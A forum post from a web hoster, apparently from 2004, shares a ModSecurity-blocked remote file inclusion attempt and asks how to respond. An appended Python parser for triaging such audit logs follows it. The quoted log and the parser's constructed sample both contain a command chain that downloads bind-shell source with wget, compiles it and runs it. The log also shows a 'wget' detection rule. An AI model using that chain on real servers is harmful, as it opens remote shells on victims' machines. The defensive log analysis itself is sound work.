So you stopped hackers at work, what next?
Ok, just a simple attack example of what happened today (one of many, I guess, and good file permissions and ModSecurity prevented it):
HTTP/1.1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 193.95.229.34 - - [29/Sep/2004:15:10:36 +0200] "GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://*******/jmascare/cmd.txt?&cmd=cd%20/usr/tmp;wget%20http://www.*********.org/archives/konewka/mybindshell.c;gcc%20mybindshell.c%20-o%20bind;./bind HTTP/1.1" 500 0
Handler: server-parsed
Error: File does not exist: /home/******/public_html/500.shtml
----------------------------------------
GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://*******/jmascare/cmd.txt?&cmd=cd%20/usr/tmp;wget%20http://www.********.org/archives/konewka/mybindshell.c;gcc%20mybindshell.c%20-o%20bind;./bind HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Keep-Alive
Host: www.********
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; .NET CLR 1.1.4322)
mod_security-message: Access denied with code 500. Pattern match "wget\x20" at THE_REQUEST.
mod_security-action: 500
So I blanked out some addresses, but when I look up those addresses I find some 'interesting' programs/scripts and text files which show, for example, some involvement in a so-called legal security site.
I could show those addresses here, but I don't think that would be wise. What I want to know is what you guys do in cases like this. Just block the IPs and that's it? Send the addresses to the FBI or something like that? Until now we really did nothing but learn from these attacks. We have had it with these ********! We want to share info like this with others. Where is the right place to do this?
Hosters unite I would say...
Thanks!
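An added example (not from the original post) of how a hoster could triage entries like the one above: a small Python parser for the mod_security audit-log layout quoted in the post that pulls out the client, the rule that fired and the decoded query, and flags any parameter whose value is a remote URL, which is the remote-file-inclusion pattern this request shows. The sample entry is constructed, with a documentation IP and placeholder host names.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample in the mod_security 1.x audit-log layout the post quotes.
# IP and host names are documentation placeholders, not real indicators.
SAMPLE_ENTRY = r"""========================================
Request: 203.0.113.5 - - [29/Sep/2004:15:10:36 +0200] "GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://attacker.example/cmd.txt?&cmd=cd%20/usr/tmp;wget%20http://attacker.example/bind.c;gcc%20bind.c%20-o%20bind;./bind HTTP/1.1" 500 0
Handler: server-parsed
Error: File does not exist: /home/user/public_html/500.shtml
----------------------------------------
GET /guestbook/include/livre_include.php?no_connect=lol&chem_absolu=http://attacker.example/cmd.txt?&cmd=cd%20/usr/tmp;wget%20http://attacker.example/bind.c;gcc%20bind.c%20-o%20bind;./bind HTTP/1.1
Host: www.victim.example
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
mod_security-message: Access denied with code 500. Pattern match "wget\x20" at THE_REQUEST.
mod_security-action: 500
"""

# Request: <client> <ident> <user> [<time>] "<method> <target> <proto>" <status> <bytes>
REQUEST_RE = re.compile(
    r'^Request: (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})', re.M)
RULE_RE = re.compile(r'Pattern match "(?P<pattern>[^"]+)" at (?P<location>\w+)')
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.I)

def split_query(query):
    """Decode name=value pairs; split only on '&' so ';' chains in a value survive."""
    params = {}
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        params[unquote(name)] = unquote(value)
    return params

def remote_include_params(params):
    """Parameter names whose value is a remote URL: the classic RFI signature."""
    return sorted(n for n, v in params.items() if REMOTE_URL_RE.match(v))

def parse_entry(entry):
    """Pull the fields an analyst triages from one audit-log entry, or None."""
    m = REQUEST_RE.search(entry)
    if not m:
        return None
    params = split_query(urlsplit(m['target']).query)
    rule = RULE_RE.search(entry)
    return {
        'client': m['client'], 'time': m['time'], 'method': m['method'],
        'path': urlsplit(m['target']).path, 'status': int(m['status']),
        'params': params, 'remote_include': remote_include_params(params),
        'rule': rule.groupdict() if rule else None,
    }
```

Running `parse_entry(SAMPLE_ENTRY)` shows the decoded `cmd` value as the shell chain the attacker wanted the included script to run, which is the detail worth keeping when you decide whether to block or report a source.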